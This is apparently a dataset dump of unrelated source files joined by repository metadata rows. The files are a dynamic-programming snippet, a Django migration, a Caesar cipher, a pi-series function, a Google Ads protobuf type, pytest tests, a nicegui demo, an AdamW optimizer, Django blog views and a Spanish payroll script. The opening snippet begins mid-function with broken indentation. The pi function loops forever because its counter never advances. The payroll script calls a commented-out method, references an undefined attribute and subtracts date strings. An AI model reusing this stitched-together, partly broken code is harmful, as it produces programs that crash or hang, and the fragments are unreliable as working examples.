for i in range(0, n - len(sub_str) + 1):
if max_value < dp[i]:
max_value = dp[i]
if full_str[n:].startswith(sub_str):
dp[n] = max_value + 1
else:
dp[n] = max_value
if __name__ == '__main__':
    # Read the document and the search word, run the DP for every start
    # position, and print the maximum number of non-overlapping matches.
    full_str = input()
    sub_str = input()
    dp = [0] * len(full_str)
    for i in range(0, len(full_str)):
        calc_dp(i)
    print(max(dp))
| [
"gilmat@naver.com"
] | gilmat@naver.com |
f1874cffe8589d7d7cb20dd323029128249aa73e | 71c247dc9bc9fe8c16daec09f337010043ca2943 | /questions/migrations/0002_petmodel.py | 7b116ee386fe280497d4e5214568220213cb4710 | [] | no_license | elcolie/muy | c001c64499c7ecf4a18fd4da5c7263f880a4be2f | 7e8fcc83c9d875806f18c2a57f1d8b6351e6be04 | refs/heads/master | 2020-07-06T03:10:09.449152 | 2019-12-06T12:24:04 | 2019-12-06T12:24:04 | 125,982,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | # Generated by Django 2.2.4 on 2019-10-16 07:59
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: creates the PetModel table with an
    # auto primary key and a constrained "kind" choice field (cat/dog).
    dependencies = [
        ('questions', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='PetModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('kind', models.CharField(choices=[('cat', 'Cat'), ('dog', 'Dog')], max_length=100)),
            ],
        ),
    ]
| [
"sarit@elcolie.com"
] | sarit@elcolie.com |
6a25852b6293b3676b6b0198c0d93d674c6fc44f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02848/s039122387.py | f66ce6cbc8f4c644979fe91d95726caeea7782fa | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | n=int(input())
s=input()
ans=""
for i in s:
ans+=chr(ord("A")+(ord(i)-ord("A")+n)%26)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
56acdc0c52bd147e4d98d3216d0555fd47d3e5c9 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_084/ch150_2020_04_13_19_48_43_698298.py | dfe80f0c803c05abcffb09810115898aee8b8f15 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | import math
def calcula_pi(n):
    """Approximate pi via the Basel series: pi**2 / 6 == sum(1/i**2).

    Sums the first ``n`` terms of 6/i**2 and returns the square root of the
    partial sum, which converges to pi as ``n`` grows.

    For n <= 0 the partial sum is empty and 0.0 is returned (the original
    raised UnboundLocalError in that case).
    """
    # Bug fix: the original `while i <= n` loop never incremented `i`, so it
    # spun forever for any n >= 1. A `for` over range() cannot stall.
    parcial = 0.0
    for i in range(1, n + 1):
        parcial += 6 / i ** 2
    return math.sqrt(parcial)
"you@example.com"
] | you@example.com |
18839609dbc881470c5684a1cfaa7e08aa130f9f | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/ads/googleads/v5/googleads-py/google/ads/googleads/v5/common/types/text_label.py | 0c14a9e62aed19713a0e6374abd7c8229def98dd | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,724 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import wrappers_pb2 as wrappers # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v5.common',
marshal='google.ads.googleads.v5',
manifest={
'TextLabel',
},
)
class TextLabel(proto.Message):
    r"""A type of label displaying text on a colored background.
    Attributes:
        background_color (google.protobuf.wrappers_pb2.StringValue):
            Background color of the label in RGB format. This string
            must match the regular expression
            '^#([a-fA-F0-9]{6}|[a-fA-F0-9]{3})$'. Note: The background
            color may not be visible for manager accounts.
        description (google.protobuf.wrappers_pb2.StringValue):
            A short description of the label. The length
            must be no more than 200 characters.
    """
    # Wire field 1; a wrapped string so "unset" is distinguishable from "".
    background_color = proto.Field(proto.MESSAGE, number=1,
        message=wrappers.StringValue,
    )
    # Wire field 2; same wrapper type as above.
    description = proto.Field(proto.MESSAGE, number=2,
        message=wrappers.StringValue,
    )
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
bd39e9509d27e59130f875225feec6bf5ec17ecc | d190750d6cb34e9d86ae96724cf4b56a2f57a74a | /tests/r/test_thurstone.py | e349ecc070dc0a55dfa91d013b7380c34c3f5900 | [
"Apache-2.0"
] | permissive | ROAD2018/observations | a119f61a48213d791de0620804adb8d21c2ad9fb | 2c8b1ac31025938cb17762e540f2f592e302d5de | refs/heads/master | 2021-09-24T04:28:02.725245 | 2018-09-16T23:06:30 | 2018-09-16T23:06:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.thurstone import thurstone
def test_thurstone():
    """Test module thurstone.py by downloading thurstone.csv and checking
    that the extracted data has 9 rows and 9 columns.
    """
    # try/finally removes the temporary directory on success as well as on
    # failure. The original only cleaned up on error (leaking the directory
    # on a passing run), used a bare `except:`, and called `raise()` --
    # which raises "TypeError: exceptions must derive from BaseException"
    # instead of re-raising the pending exception.
    test_path = tempfile.mkdtemp()
    try:
        x_train, metadata = thurstone(test_path)
        assert x_train.shape == (9, 9)
    finally:
        shutil.rmtree(test_path)
| [
"dustinviettran@gmail.com"
] | dustinviettran@gmail.com |
998772f84df860c76d5e093fc8d05cddc95a48cc | 5a4c55ad757410611a65999ab7304f701a74f657 | /cratonclient/tests/__init__.py | 011af390055f25bb0a11fa1d01bb6b1c4a1d239c | [
"Apache-2.0"
] | permissive | opstooling/python-cratonclient | 28426596be6dbd76696edb26235ee0d2bbf9ec67 | c123f0e35dbc0e99186f2c8ec65864d7834e0edb | refs/heads/master | 2021-01-20T20:35:55.003738 | 2016-07-06T16:18:58 | 2016-07-06T16:18:58 | 61,128,908 | 0 | 1 | null | 2016-07-13T17:26:03 | 2016-06-14T14:19:38 | Python | UTF-8 | Python | false | false | 591 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test suite for Craton client and shell."""
| [
"graffatcolmingov@gmail.com"
] | graffatcolmingov@gmail.com |
f4014bf9c030093fdd9e44efc7935f2677b3b1ca | 1796043fc26c958b8fc45d9c058e382473c4f3af | /Fabio02_A/f2_a_q22_duracao_jogo.py | dbb6ae9b4c8f2bf3916f579e31f17f48cda61bfd | [] | no_license | Lucakurotaki/ifpi-ads-algoritmos2020 | a69adec27dbb10aceab1bc7038a0b56a760f99d1 | 34d5fedd5825a85404cf9340e42be618981679c1 | refs/heads/master | 2022-03-22T04:44:14.211359 | 2022-02-19T18:48:36 | 2022-02-19T18:48:36 | 246,585,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | def main():
h_inicio = int(input("Digite a hora do início do jogo: "))
m_inicio = int(input("Digite o minuto do início do jogo: "))
h_fim = int(input("Digite a hora do fim do jogo: "))
m_fim = int(input("Digite o minuto do fim do jogo: "))
print(duracao(h_inicio,m_inicio,h_fim,m_fim))
def duracao(hi,mi,hf,mf):
if hf >= hi and mf >= mi:
dur_h = hf - hi
dur_min = mf - mi
elif hf <= hi and mf < mi:
dur_h = 23+hf - hi
dur_min = 60+mf - mi
elif hf < hi and mf >= mi:
dur_h = 24+hf - hi
dur_min = mf - mi
elif hf > hi and mf < mi:
dur_h = hf - hi
dur_min = 60+mf - mi
return "A duração do jogo é de {} horas e {} minutos.".format(dur_h,dur_min)
main()
| [
"noreply@github.com"
] | Lucakurotaki.noreply@github.com |
20ddfbe36286b792f45620f1976827510cbe3b1c | 74549d7c57b4746ac2a9c275aa12bfc577b0e8af | /prob9.py | a921e7c7ee4566f8d4b41372890da77be1ee213e | [] | no_license | abidkhan484/hackerrank_solution | af9dbf6ec1ead920dc18df233f40db0c867720b4 | b0a98e4bdfa71a4671999f16ab313cc5c76a1b7a | refs/heads/master | 2022-05-02T11:13:29.447127 | 2022-04-13T03:02:59 | 2022-04-13T03:02:59 | 99,207,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | def facto(x):
if(x<=0):
return 1
else:
result=1
result = x * facto(x-1)
return result
# Read one integer from stdin and print its factorial (judge driver).
user_input = int(input().strip())
print(facto(user_input))
| [
"abidkhan484@gmail.com"
] | abidkhan484@gmail.com |
1c4a50aa0a877c28978f7261fdd1fcd169ddfdb8 | b913242e405a7e8860501df6fd8c41513a32e820 | /custom_test.py | 599db660a03cf659a909a8601364125523ca3403 | [
"MIT"
] | permissive | qiuwei/nicegui | 55d34507e3a5dc4e1e0565c5559f81610e5df4ca | aa0c781a80b8e05d8ada0a4cddd670a7ae13fcda | refs/heads/main | 2023-09-04T18:29:48.801099 | 2021-11-25T13:26:36 | 2021-11-25T13:26:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | #!/usr/bin/env python3
from nicegui import ui
# Demo page: a card hosting a custom element whose value changes update a
# label, plus a button that bumps the value and a standalone joystick.
with ui.card():
    # NOTE(review): the on_change lambda closes over `label`, which is only
    # assigned two lines below -- fine as long as the first change event
    # fires after this block runs; confirm against nicegui's event timing.
    example = ui.custom_example(on_change=lambda number: label.set_text(f'Custom value: {number}'))
    ui.button('Add 100', on_click=lambda: example.add(100))
    label = ui.label()
ui.joystick(on_move=lambda e: print("move", e.data.vector), color='blue', size=50)
| [
"falko@zauberzeug.com"
] | falko@zauberzeug.com |
6bf9e79c5fe871e199d6a500d86789841ddc85db | 1d717c797e93b451f7da7c810a0fb4075b1050d5 | /src/optimizer/adamw.py | 11c4536636c11dfc4bdcbd94a8f3a606d9e9e307 | [] | no_license | jessie0624/nlp-task | 32338b08051a3ea192db2bf74c9c969bdff1f6ad | aaeeed86341356d9fd061664f6f7bccf2ac353d0 | refs/heads/master | 2023-01-24T12:06:13.323646 | 2020-12-10T08:38:23 | 2020-12-10T08:38:23 | 292,151,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,386 | py | #!/usr/bin/env python
# encoding: utf-8
'''
@author: zessay
@license: (C) Copyright Sogou.
@contact: zessay@sogou-inc.com
@file: adamw.py
@time: 2019/12/4 17:49
@description: AdamW优化器函数
'''
import torch
import math
from torch.optim.optimizer import Optimizer
class AdamW(Optimizer):
    """ Implements Adam algorithm with weight decay fix.
    Parameters:
        lr (float): learning rate. Default 1e-3.
        betas (tuple of 2 floats): Adams beta parameters (b1, b2). Default: (0.9, 0.999)
        eps (float): Adams epsilon. Default: 1e-6
        weight_decay (float): Weight decay. Default: 0.0
        correct_bias (bool): can be set to False to avoid correcting bias in Adam (e.g. like in Bert TF repository). Default True.
    Example:
        >>> model = LSTM()
        >>> optimizer = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-5)
    """
    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-6, weight_decay=0.0, correct_bias=True):
        # Validate hyper-parameters up front so a bad configuration fails
        # loudly at construction time instead of mid-training.
        if lr < 0.0:
            raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter: {} - should be in [0.0, 1.0[".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter: {} - should be in [0.0, 1.0[".format(betas[1]))
        if not 0.0 <= eps:
            raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(eps))
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
                        correct_bias=correct_bias)
        super(AdamW, self).__init__(params, defaults)
    def step(self, closure=None):
        """Performs a single optimization step.
        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                # Parameters that did not take part in the backward pass
                # have no gradient and are skipped.
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
                state = self.state[p]
                # State initialization (lazy, on first update of this param)
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['exp_avg'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['exp_avg_sq'] = torch.zeros_like(p.data)
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                beta1, beta2 = group['betas']
                state['step'] += 1
                # Decay the first and second moment running average coefficient
                # In-place operations to update the averages at the same time
                exp_avg.mul_(beta1).add_(1.0 - beta1, grad)
                exp_avg_sq.mul_(beta2).addcmul_(1.0 - beta2, grad, grad)
                denom = exp_avg_sq.sqrt().add_(group['eps'])
                step_size = group['lr']
                if group['correct_bias']: # No bias correction for Bert
                    bias_correction1 = 1.0 - beta1 ** state['step']
                    bias_correction2 = 1.0 - beta2 ** state['step']
                    step_size = step_size * math.sqrt(bias_correction2) / bias_correction1
                # Parameter update: p -= step_size * exp_avg / denom
                p.data.addcdiv_(-step_size, exp_avg, denom)
                # Just adding the square of the weights to the loss function is *not*
                # the correct way of using L2 regularization/weight decay with Adam,
                # since that will interact with the m and v parameters in strange ways.
                #
                # Instead we want to decay the weights in a manner that doesn't interact
                # with the m/v parameters. This is equivalent to adding the square
                # of the weights to the loss with plain (non-momentum) SGD.
                # Add weight decay at the end (fixed version)
                if group['weight_decay'] > 0.0:
                    p.data.add_(-group['lr'] * group['weight_decay'], p.data)
        return loss
"jessie_lijie@126.com"
] | jessie_lijie@126.com |
4515b2a2c837a6c1b1154219c1123b96f284b6fc | 0216ac17591c6b3d68cb454371ecd3a5564c7af4 | /project_2/coupled-cluster/tests/test_matrix_elements.py | 2851e2bb3321dbe085273adae5bdd776e8250ba0 | [] | no_license | Schoyen/FYS4411 | 3746a155b4026dbf04009cb4e8960a23201351fe | abb580c3c8bb41a71657f559c27bc6e21e04bf17 | refs/heads/master | 2021-05-11T06:34:02.909787 | 2019-06-27T12:49:00 | 2019-06-27T12:49:00 | 117,991,933 | 1 | 0 | null | 2018-03-06T20:22:03 | 2018-01-18T14:16:08 | Jupyter Notebook | UTF-8 | Python | false | false | 1,300 | py | import pytest
import sparse
from coupled_cluster.matrix_elements.index_map import (
get_indices_nm, generate_index_map
)
from coupled_cluster.matrix_elements.generate_matrices import (
get_coulomb_elements, get_antisymmetrized_elements,
get_one_body_elements_spin
)
def test_two_body_generation():
    """Regenerated Coulomb elements must match the stored fixture values."""
    # Fixture data is attached to the pytest module object (presumably by
    # conftest.py) -- TODO confirm.
    orbital_integrals = pytest.orbital_integrals
    l = pytest.l
    num_shells = pytest.num_shells
    generate_index_map(num_shells)
    sparse.utils.assert_eq(
        orbital_integrals, get_coulomb_elements(l), atol=1e-5, rtol=1e-5)
def test_two_body_antisymmetric_generation():
    """Antisymmetrized two-body elements must match the fixture tensor."""
    # `u` and friends come from module-level pytest attributes set by
    # conftest.py -- TODO confirm.
    u = pytest.u
    l = pytest.l
    num_shells = pytest.num_shells
    generate_index_map(num_shells)
    sparse.utils.assert_eq(
        u, get_antisymmetrized_elements(l), atol=1e-5, rtol=1e-5)
def test_one_body_generation():
    """Spin-doubled one-body elements must match the fixture matrix."""
    h = pytest.h
    l = pytest.l
    num_shells = pytest.num_shells
    generate_index_map(num_shells)
    sparse.utils.assert_eq(
        h, get_one_body_elements_spin(l), atol=1e-5, rtol=1e-5)
def test_large_file():
    """Coulomb-element generation must also agree on the large fixture."""
    l = pytest.large_l
    orbital_integrals = pytest.large_oi
    num_shells = pytest.large_num_shells
    generate_index_map(num_shells)
    u = get_coulomb_elements(l)
    sparse.utils.assert_eq(orbital_integrals, u)
| [
"oyvindschoyen@gmail.com"
] | oyvindschoyen@gmail.com |
35cef8b4c3957b43e069b2a8df2b8e7caefbb133 | e747bac825ed5807f72654030e108b8c8f96b902 | /mysite/.history/blog/views_20200716005453.py | df0879463678c569afeeac8f8bd0ce8858bd4344 | [] | no_license | AyatSoft/Tech_blog | 4415ab7dfb04bc53bddaf16fd4772e8554680ae8 | 4728c44e0685c3b97038db5e0232e12f35446e23 | refs/heads/master | 2022-11-15T23:01:52.310968 | 2020-07-16T08:52:51 | 2020-07-16T08:52:51 | 280,103,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,194 | py | from .models import Post
from django.shortcuts import render, HttpResponsePermanentRedirect
from django.contrib.auth.mixins import LoginRequiredMixin
from .forms import PostForm, CommentForm, MyRegistrationForm
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy, reverse
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.decorators import login_required
# TODO:
# - set up the sign-in page
# - set up the sign-up page
# - add the necessary redirects
# - set up forms for the sign-in and sign-up pages
# - make a sign-up model
# (the auth views below are function-based)
def sign_up(request):
    """Render the registration page and create a new account on valid POST."""
    form = MyRegistrationForm()
    registered = False
    if request.method == "POST":
        # Re-bind the form with the submitted data.
        form = MyRegistrationForm(data=request.POST)
        if form.is_valid():
            form.save()
            registered = True
    # `registered` lets the template show a success message; an invalid form
    # is re-rendered with its errors.
    fdict = {'form': form, 'registered': registered}
    return render(request, 'registration/register.html', fdict)
def login_user(request):
    """Log a user in via Django's AuthenticationForm.

    GET renders the login form; a valid POST authenticates the credentials
    and redirects to the post list. Invalid credentials fall through and the
    form is re-rendered with its errors.

    Changes from the original: the leftover debug ``print(user)`` and the
    dead ``loggedin`` flag (set but never read) are removed.
    """
    form = AuthenticationForm()
    if request.method == "POST":
        form = AuthenticationForm(data=request.POST)
        if form.is_valid():
            username = form.cleaned_data.get('username')
            password = form.cleaned_data.get('password')
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                # NOTE(review): a 301 permanent redirect can be cached by
                # browsers; a temporary redirect is usually preferred after
                # login. Kept as-is to avoid changing imports/behaviour.
                return HttpResponsePermanentRedirect(reverse('blog:post_list'))
    return render(request, 'registration/login.html', {'form': form})
@login_required
def logout_user(request):
    """Log the current user out and send them back to the post list."""
    logout(request)
    # NOTE(review): permanent (301) redirects may be cached by browsers; a
    # temporary redirect is the usual choice here -- confirm intent.
    return HttpResponsePermanentRedirect(reverse('blog:post_list'))
class AboutView(TemplateView):
    # Static "about" page; only the template needs to be specified.
    template_name = "blog/about.html"
class PostListView(ListView):
    model = Post
    # Newest-first ordering by publication date.
    def get_queryset(self):
        return Post.objects.order_by('-published_date')
class PostDetailView(DetailView):
    # Default DetailView behaviour: look up a single Post by pk/slug.
    model = Post
# The create view below uses LoginRequiredMixin, the class-based-view
# equivalent of the @login_required decorator used on the function-based
# views above.
class CreatePostView(LoginRequiredMixin, CreateView):
    # Where LoginRequiredMixin sends unauthenticated users.
    login_url = '/login/'
    # Query-string parameter name the mixin uses for the post-login target.
    redirect_field_name = 'blog/post_detail.html'
    # Creation happens through a bound PostForm.
    form_class = PostForm
    template_name = "blog/post_form.html"
    def form_valid(self, form):
        """Attach the logged-in user as the author before saving.

        The author is not part of the form fields, so it would otherwise be
        left empty (the model requires it); setting it here ties every new
        post to the current user.
        """
        form.instance.author_id = self.request.user.pk
        return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UpdateView):
    # Same login gating and form setup as CreatePostView, but editing an
    # existing Post instance.
    login_url = '/login/'
    redirect_field_name = 'blog/post_detail.html'
    form_class = PostForm
    template_name = "blog/post_form.html"
    model = Post
# Same pattern as the published list, but for unpublished drafts, so the
# queryset is changed accordingly.
class DraftListView(LoginRequiredMixin, ListView):
    # Unpublished posts only (no published_date yet), oldest first.
    login_url = '/login/'
    redirect_field_name = 'blog/post_list.html'
    model = Post
    def get_queryset(self):
        return Post.objects.filter(published_date__isnull=True).order_by('created_date')
class PostDeleteView(LoginRequiredMixin, DeleteView):
    model = Post
    # reverse_lazy defers URL resolution until the deletion has actually
    # succeeded (and avoids resolving URLs at import time).
    success_url = reverse_lazy('blog:post_list')
| [
"tanviredu2018@gmail.com"
] | tanviredu2018@gmail.com |
b9ff9e359c42c6f56fe741cd5dca07ef4ea2980f | 7b12eb45c1ea76ad9c186b858b5dfebf2c5b862a | /.history/DEBER_20210904233156.py | f759b7aca2a0174716d1d345f4abf0c57a897202 | [
"MIT"
] | permissive | Alopezm5/PROYECTO-PARTE-1 | a1dce04009b24852c1c60e69bdf602ad3af0574b | bd7a8594edf08d41c6ca544cf6bac01ea4fcb684 | refs/heads/main | 2023-07-25T11:22:17.994770 | 2021-09-07T03:27:34 | 2021-09-07T03:27:34 | 403,670,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | import os
class Empresa():
    """Company record: identity and contact data, filled in from stdin."""
    def __init__(self,nom="",ruc=0,dire="",tele=0,ciud="",tipEmpr=""):
        self.nombre=nom
        self.ruc=ruc
        self.direccion=dire
        self.telefono=tele
        self.ciudad=ciud
        self.tipoEmpresa=tipEmpr
    def datosEmpresa(self):
        """Prompt for every company field on stdin (numeric fields as int)."""
        self.nombre=input("Ingresar nombre de la empresa: ")
        self.ruc=int(input("Ingresar ruc de la empresa: "))
        self.direccion=input("Ingresar la direccion de la empresa: ")
        self.telefono=int(input("Ingresar el numero de telefono de la empresa: "))
        self.ciudad=input("Ingresar ciudad donde esta la empresa: ")
        self.tipoEmpresa=input("Ingresar tipo de empresa publica o privada: ")
    def mostrarEmpresa(self):
        """Print a formatted summary of the company data."""
        print("")
        print("Datos de la Empresa")
        print("La empresa de nombre {}\n De RUC #{} \n Está ubicada en {}\n Se puede comunicar al #{}\n Está empresa esta en la ciudad de {}\n Es una entidad {}".format(self.nombre,self.ruc,self.direccion, self.telefono,self.ciudad, self.tipoEmpresa))
class Empleado(Empresa):
    """Employee record (personal data plus the IESS contribution rate).

    NOTE(review): inheriting from Empresa is a questionable "is-a"
    relationship -- composition would model this better; left as-is.
    """
    def __init__(self,nom="",cedu=0,dire="",tele=0,email="",estado="",profe="",iess=0):
        self.nombre=nom
        self.cedula=cedu
        self.direccion=dire
        self.telefono=tele
        self.correo=email
        self.estadocivil=estado
        self.profesion=profe
        self.iess=iess
    def empleado(self):
        """Prompt for the common employee fields on stdin."""
        self.nombre=input("Ingresar nombre del empleado: ")
        self.cedula=int(input("Ingresar numero de cedula del empleado: "))
        self.direccion=input("Ingresar la direccion del empleado: ")
        self.telefono=int(input("Ingresar numero de contacto del empleado: "))
        self.correo=input("Ingresar correo personal del empleado: ")
        self.iess=float(input("Ingresar valor del iees recordar que debe ser porcentuado Ejemplo si quiere decir 20% debe ingresar 0.20"))
    def empleadoObrero(self):
        # Extra field collected only for "obrero" employees.
        self.estadocivil=input("Ingresar estado civil del empleado: ")
    def empleadoOficina(self):
        # Extra field collected only for office employees.
        self.profesion=input("Ingresar profesion del empleado: ")
    # NOTE(review): mostrarempleado() is commented out below, but the script
    # at the bottom of this file still calls emple.mostrarempleado(), which
    # raises AttributeError at runtime -- restore the method or drop the call.
    # def mostrarempleado(self):
    #     print("El empleado: {} con # de C.I. {} \n Con direccion {}, y numero de contacto{}\n Y correo {}".format(self.nombre,self.cedula,self.direccion,self.telefono,self.correo))
class Departamento(Empleado):
    """Department assignment for an employee.

    NOTE(review): __init__ does not call super().__init__(), so the
    Empleado/Empresa attributes are absent on Departamento instances --
    confirm this is intended.
    """
    def __init__(self,dep=""):
        self.departamento=dep
    def departa(self):
        # Prompt for the employee's department.
        self.departamento=input("Ingresar el departamento al que pertenece el empleado: ")
    def mostrarDeparta(self):
        # Print the department name.
        print("El empleado pertenece al departamento de: {}".format(self.departamento))
class Pagos(Empleado):
    """Payroll calculation for an employee (obrero or oficina).

    NOTE(review): this class has several latent bugs, flagged inline below;
    the code is left untouched pending confirmation of the intent.
    """
    def __init__(self, desper=0,valhora=0,hotraba=0,extra=0,suel=0,hrecar=0,hextra=0,pres=0,mcou=0,valho=0,sobtiem=0,comofi=0,antobre=0,iemple=0,cuopres=0,tot=0,liquid=0,cuota=0,anti=0,comi=0,fNomina="",fIngreso=""):
        self.permisos=desper
        self.valorhora=valhora
        self.horastrabajadas=hotraba
        self.valextra=extra
        self.sueldo= suel
        self.horasRecargo= hrecar
        self.horasExtraordinarias=hextra
        self.prestamo= pres
        self.mesCuota= mcou
        self.valor_hora= valho
        self.sobretiempo=sobtiem
        self.comEmpOficina = comofi
        self.antiEmpObrero = antobre
        self.iessEmpleado = iemple
        self.cuotaPrestamo=cuopres
        self.totdes = tot
        self.liquidoRecibir = liquid
        # NOTE(review): self.mesCuota is assigned twice (mcou above, cuota
        # here); the second assignment silently overwrites the first.
        self.mesCuota=cuota
        self.antiguedad=anti
        self.comision=comi
        self.fechaNomina=fNomina
        self.fechaIngreso=fIngreso
    def pagoNormal(self):
        # Base salary, loan and commission data from stdin.
        self.sueldo=float(input("Ingresar sueldo del trabajador: $ "))
        self.prestamo=float(input("Ingresar monto del prestamo que ha generado el empleado: $ "))
        self.mesCuota=int(input("Ingresar meses a diferir el prestamo: "))
        self.comision=float(input("Ingresar valor de la comsion: "))
        self.antiguedad=int(input("Ingresar antiguedad: "))
    def pagoExtra(self):
        # Overtime hours and employment dates from stdin.
        # NOTE(review): the dates are kept as plain strings; calculoSueldo()
        # subtracts them, which raises TypeError -- they should be parsed
        # (e.g. datetime.date.fromisoformat) first.
        self.horasRecargo=int(input("Ingresar horas de recargo: "))
        self.horasExtraordinarias=int(input("Ingresar horas extraordinarias: "))
        self.fechaNomina=input("Ingresar fecha de nomida (formato año-mes-dia): ")
        self.fechaIngreso=input("Ingresar fecha de ingreso (formato año-mes-dia): ")
    def calculoSueldo(self):
        # 240 appears to be the assumed working hours per month -- confirm.
        self.valor_hora=self.sueldo/240
        self.sobretiempo= self.valor_hora * (self.horasRecargo*0.50+self.horasExtraordinarias*2)
        self.comEmpOficina = self.comision*self.sueldo
        # NOTE(review): string subtraction (see pagoExtra) -- TypeError here.
        self.antiEmpObrero = self.antiguedad*(self.fechaNomina - self.fechaIngreso)/365*self.sueldo
        # NOTE(review): self.iess is only set by Empleado.empleado(); a bare
        # Pagos() instance does not have it filled with a user value.
        self.iessEmpleado = self.iess*(self.sueldo+self.sobretiempo)
        self.cuotaPrestamo=self.prestamo/self.mesCuota
        # NOTE(review): `eleccion` is a module-level global set by the driver
        # script; if it is neither 1 nor 2, self.toting is never assigned.
        if eleccion==1:
            self.toting = self.sueldo+self.sobretiempo+ self.comEmpOficina
        elif eleccion==2:
            self.toting = self.sueldo+self.sobretiempo+self.antiEmpObrero
        # NOTE(review): self.prestamoEmpleado is never defined anywhere, so
        # this raises AttributeError; self.cuotaPrestamo was likely intended.
        self.totdes = self.iessEmpleado + self.prestamoEmpleado
        self.liquidoRecibir = self.toting - self.totdes
    def mostrarSueldo(self):
        # Print the net amount the employee receives.
        print(self.liquidoRecibir)
# --- Interactive driver -----------------------------------------------------
# Collects company, employee, department and payroll data from stdin and
# prints the results. os.system("cls") clears the console (Windows-only).
emp=Empresa()
emp.datosEmpresa()
os.system ("cls")
emple=Empleado()
emple.empleado()
os.system ("cls")
# NOTE(review): `eleccion` is read as a global by Pagos.calculoSueldo().
eleccion=int(input("Va a ingresar un empleado tipo 1. Obreo o 2.Oficina: "))
emple.empleadoObrero()
emple.empleadoOficina()
os.system ("cls")
depa=Departamento()
depa.departa()
# NOTE(review): `pag` is a fresh Pagos() whose iess attribute was never set
# from user input (only `emple` got one), so calculoSueldo() uses the default.
pag=Pagos()
pag.pagoNormal()
pag.pagoExtra()
pag.calculoSueldo()
os.system ("cls")
emp.mostrarEmpresa()
print("")
# NOTE(review): Empleado.mostrarempleado() is commented out in the class
# above, so this call raises AttributeError.
emple.mostrarempleado()
print("")
pag.mostrarSueldo()
"85761855+Alopezm5@users.noreply.github.com"
] | 85761855+Alopezm5@users.noreply.github.com |
